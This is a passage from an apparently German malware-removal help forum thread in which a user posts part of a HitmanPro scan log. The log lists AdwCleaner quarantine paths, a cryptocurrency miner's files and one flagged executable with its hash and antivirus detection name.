          4.9s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          7.0s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.4s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.9s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          8.1s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         12.0s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

BaBi · 13.02.2017, 22:51

hitman teil 2

Code:

ATTFilter

   C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
      Size . . . . . . . : 320.512 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.6
      SHA-256  . . . . . : F44CE613F48EE1C918E32721D17280FDCA7721BBFC725CF19CFCC43EB81A929F
    > Bitdefender  . . . : Gen:Variant.Razy.124673
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -1.9s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -1.8s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.4s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.2s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.2s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.7s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.6s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.6s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.5s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.3s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.2s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.1s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
          0.0s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
          0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
          0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
          0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.3s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
